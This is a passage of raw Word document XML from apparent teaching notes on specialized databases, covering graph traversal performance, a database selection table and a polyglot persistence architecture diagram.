              <w:t>Aggregations over entire dataset (SUM all sales)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="72E57FB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593862" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Pattern matching (fraud rings, network motifs)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D4CDBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>High write throughput (append-only streams)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="683D50A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62325A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Connected data exploration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3285A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Tabular data with fixed schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0F2C666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4BBE29" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Real-time recommendations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CAD3CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Full-text search (use Elasticsearch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="6D35743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61F5E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Access control / permission graphs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229EDF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Time-series data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0B145DE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B8BD26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Knowledge graphs / ontologies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3D19D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Simple key-value access patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27639E92" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Graph DB Performance Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7023C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD7E4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Traversal depth vs. performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED34D41" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4B478510" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Depth 1 (direct friends): microseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C89779" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Depth 2 (friends of friends): milliseconds (k² nodes visited)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767BC92" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Depth 3: 10s of milliseconds (k³ nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BA0F0C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Depth 4-5: 100ms–1s (depending on graph density)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E00951" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Depth 6+: Can be expensive (billions of paths in dense graphs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D2269E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="13204C19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key optimization: LIMIT traversal with WHERE clauses, DISTINCT, path length bounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914269C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="751A0C1B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Graph size vs. traversal performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F550F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  100M nodes, traversal depth 3: ~same speed as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157ECDA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1B nodes, traversal depth 3: (because index-free adjacency is LOCAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA387A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68974324" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Performance depends on LOCAL graph structure, not TOTAL database size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7AE7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  This is the superpower of graph databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDFF9F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2D18567A">
          <v:rect id="_x0000_i5909" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52746D86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 5: Comparison and Selection Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A83C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to Use What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182"/>
        <w:gridCol w:w="2576"/>
        <w:gridCol w:w="3592"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="31B964D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BE1174" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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B076C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best Database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C91F10" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5EAA552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5E05D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Infrastructure metrics at 1M points/sec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11CC83" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Prometheus + VictoriaMetrics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DF902A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Purpose-built compression, PromQL, retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7E9493E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9288D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>IoT sensor data with SQL analytics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98BD14" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>TimescaleDB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9A96B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>SQL familiarity, JOINs with relational data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7C261B4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FB6302" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>High-write messaging/events (multi-DC)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1205E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Cassandra / ScyllaDB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78BE37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Linear write scaling, multi-DC, always available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="43558A9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F1175B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Product search with facets + relevance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19F07A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Elasticsearch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2B39D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Inverted index, BM25 scoring, aggregations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="3AD8305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B2E59A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Log analytics (ELK stack)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1F0C81" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Elasticsearch + Kibana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2F763F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Full-text search, real-time analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2B86343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C46C0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Social network features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7209C3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Neo4j</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ED4BEA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Traversals, recommendations, pattern matching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="3953310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8CE9BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Fraud detection (ring patterns)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EF9208" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Neo4j / TigerGraph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C23AB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Multi-hop pattern matching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="47EF924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8DD73A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Real-time analytics dashboard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86B08D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ClickHouse or Druid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2FDAF3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Columnar, fast aggregations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="15A2722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CBFE05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Session storage / caching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DCD730" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Redis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383051" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Sub-ms latency, TTL, data structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7D3C8E3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0172F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Primary OLTP with relationships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A46E29" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>PostgreSQL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22DB1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ACID, mature, flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="172809E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Polyglot Persistence Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FBDFF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F8E7DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE39F16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                        Application Layer                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B09BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90EC6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │          │          │          │          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCAF2DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D38C8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C40B10" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Postgres│ │ Redis  │ │Elastic │ │  Neo4j │ │Cassandra│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE938BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│(OLTP)  │ │(Cache) │ │(Search)│ │(Graph) │ │(Events)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32488E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│        │ │        │ │        │ │        │ │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76165BA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Orders  │ │Sessions│ │Product │ │Social  │ │Activity│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C62CFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Users   │ │Hot data│ │search  │ │graph   │ │feeds   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B8EFB5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Payments│ │Counters│ │Logs    │ │Recomm. │ │IoT data│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0A7A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└────────┘ └────────┘ └────────┘ └────────┘ └────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBC94A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6C9F7C1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each database used for what it does BEST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69869B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Data flows between them via CDC/events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DBDF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PostgreSQL remains the source of truth for transactional data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D04B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAE0D6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No single database excels at everything. Time-series databases optimize for append-only temporal data. Cassandra optimizes for write-heavy, always-available distributed workloads. Elasticsearch optimizes for full-text search and analytics. Graph databases optimize for relationship traversal. The art of system design is choosing the right database for each access pattern — and connecting them into a coherent architecture where data flows from the authoritative source to the specialized stores that serve each query pattern optimally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468209E" w14:textId="77777777" w:rsidR="00875520" w:rsidRDefault="00875520" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="5771C6A5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Specialized Databases — Time Series, Cassandra, Elasticsearch, Graph (Neo4j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE85C0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="2C2EF2FF">
          <v:rect id="_x0000_i5957" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE0079" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
